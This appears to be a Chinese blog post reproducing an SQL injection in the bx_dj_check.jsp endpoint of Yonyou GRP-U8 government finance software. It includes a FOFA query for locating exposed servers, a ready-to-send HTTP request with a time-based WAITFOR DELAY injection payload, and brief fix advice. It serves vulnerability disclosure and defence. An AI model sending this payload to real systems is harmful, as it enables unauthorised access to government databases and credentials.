用友 GRP-U8 bx_dj_check SQL 注入漏洞

已于 2024-03-27 11:17:47 修改
阅读量442 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全
于 2024-03-25 10:49:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/137007552
版权

产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

漏洞描述

用友GRP-U8 bx_dj_check.jsp接口存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

资产测测

FOFA:app=“用友-GRP-U8”
在这里插入图片描述

漏洞复现

GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

在这里插入图片描述
sqlmap验证在这里插入图片描述

修复建议

1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。

keepb1ue
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
0xSec
01-30 509
用友GRP-U8R10行政事业内控管理软件forgetPassword_old.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 bx_dj_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10537)
0xSec
05-14 325
用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。
漏洞复现】用友GRP-U8——dialog_moreUser_check.jsp——SQL注入
LongL_GuYu的博客
06-27 628
用友GRP-U8是一款企业管理软件,其系统`dialog_moreUser_check.jsp`接口存在SQL注入漏洞
用友GRP-U8 bx_dj_check.jsp SQL注入漏洞复现(XVE-2024-10537)
qq_39894062的博客
05-15 660
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1717
用友GRP-U8 SQL注入漏洞复现
1day 用友GRP-U8 bx_dj_check 存在SQL注入
渗透安全Sec
05-17 391
1day、漏洞复现、用友GRP-U8 bx_dj_check 存在SQL注入
漏洞复现】某友GRP-U8 SQL注入
失心少年
09-26 486
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。某友GRP-U8是某友软件推出的企业级管理软件套件,旨在助力企业实现全面数字化管理及业务优化,某友GRP-U8bx_historyDataCheck.jsp接口对用户传入的参数未进行有效的过滤,直接拼接至SQL查询的语句中,导致SQL注入漏洞,攻击者可利用该漏洞获取数据库的敏感信息。
用友GRP-U8存在SQL注入漏洞复现
2301_80115097的博客
10-26 432
fofa:app=”用友-GRP-U8用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp。
五月份0day/1day/nday漏洞汇总
qq_39894062的博客
06-01 958
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
GRP-U8行政事业内控管理软件V11.21安装教程
05-28
用友软件作为国内知名的ERP解决方案提供商,其开发的GRP-U8行政事业内控管理软件是一款专为政府机关、事业单位打造的信息化管理工具。该软件集成了财务管理、预算控制、采购管理、人力资源等多个模块,助力提升机构...
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
11-04
用友GRP-U8R10政务管理软件AO数据采集方法 本文将介绍如何使用用友GRP-U8R10政务管理软件实现AO数据采集的方法。该方法适用于审计过程中遇到的财务软件升级问题,即从用友GRP-R9 V9.7升级到用友GRP-U8R10,导致AO...
用友政务GRP-U8,近期常见问题85例解决方法
03-26
1.查询科目明细账会出现很多重复记录,2.查询明细账未按照凭证号排序3.自定义凭证打印,不打印上级科目名称:13.打开凭证箱慢15.期初余额装入中导入Excel文件报错,17.以前是双凭证模式,怎么调整为单凭证模式等等85...
用友GRP-U8财务管理软件国标数据接口输出操作方法资料.pdf
02-14
"用友GRP-U8财务管理软件国标数据接口输出操作方法资料" 用友GRP-U8财务管理软件是政府行政事业单位财务人员专用的财务管理软件。该软件通过了GB/T 24589认证,并严格遵循公司研发质量管理标准,执行GB/T 24589-...
用友Grp-U8明细账打印补丁publish.rar
10-09
本软件针对GRP-U8v10.5政务软件(政府会计制度)开发的明细账一次性打印补丁。 开发环境:SQL2008R2(低版本数据尽量能升级后再使用本补丁)。 Grp-U8(B/C/G)补丁2019-12-31. 安装手册:本补丁为绿色版,注册...
PostgreSQL:后端开发者的瑞士军刀
m0_52796585的博客
08-25 1269
PostgreSQL是一个功能丰富、高度可扩展的数据库系统,它为后端开发者提供了强大的工具来构建复杂的数据解决方案。从基础的SQL操作到高级的性能优化和安全特性,PostgreSQL都是后端开发者的可靠伙伴。随着你在使用PostgreSQL的过程中不断学习和实践,你会发现它是一个真正的瑞士军刀,能够满足你在后端开发中的各种需求。
PostgreSQL案例:planning time超长问题分析
liuzhilong的博客
08-21 970
库总是OOM,分析到是执行计划生成有问题,planning time 1秒,planning shared hit 100w。一通分析,定位到是统计信息基表pg_statistic膨胀,由于会话首次SQL执行时的CatCacheMiss,导致backend访问并缓存了pg_statistic过多的死元组数据。应用连接总会启用新会话,多个backend的总内存过大从而导致OOM。
HeidiSQL中一些简单mysql语句的含义(一)
2201_75345199的博客
08-23 536
创建一个数据库,这个是数据库的名字叫java62#删除数据库java62#查看当前mysql里的所有数据库#创建student表,varchar括号里的是字符串的长度#查看当前数据库里有哪些表#删除student表。
关于超长字符串/文本对应的数据从excel导入到PL/SQL中的尝试
最新发布
qq_44835418的博客
08-25 117
时, clob会自动把类型转换为varchar2(4000)类型,也就是clob字段使用insert into时也会限制字节数不超过4000, 而如果手动粘贴复制时,则不存在限制4000字节的问题。因为想了好久,也不能在python脚本中将读取到的CLOB类型长文本数据变成可以全部保留数据的格式生成对应的sql代码,所以我选择了截取不超过4000的部分的数据来生成INSERT INTO代码, 然后再去PL/SQL上执行SQL, 然后看看那些有被截取, 被截取的我在手动的复制粘贴补充完整。
用友GRP-U8高校内控管理软件 漏洞
07-28
- *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值